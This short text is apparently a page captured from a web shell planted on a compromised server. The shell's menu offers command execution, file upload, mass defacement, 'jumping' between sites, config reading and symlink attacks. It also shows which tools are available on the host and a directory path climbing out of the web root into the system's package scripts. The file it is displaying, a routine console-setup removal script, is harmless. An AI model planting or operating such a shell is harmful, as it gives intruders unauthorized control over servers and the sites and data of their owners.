OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/../lib/dpkg/info/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/bin/sh set -e CONFIGDIR=/etc/console-setup if [ "$1" = remove ]; then update-alternatives --remove vtrgb "$CONFIGDIR/vtrgb" update-alternatives --remove vtrgb "$CONFIGDIR/vtrgb.vga" fi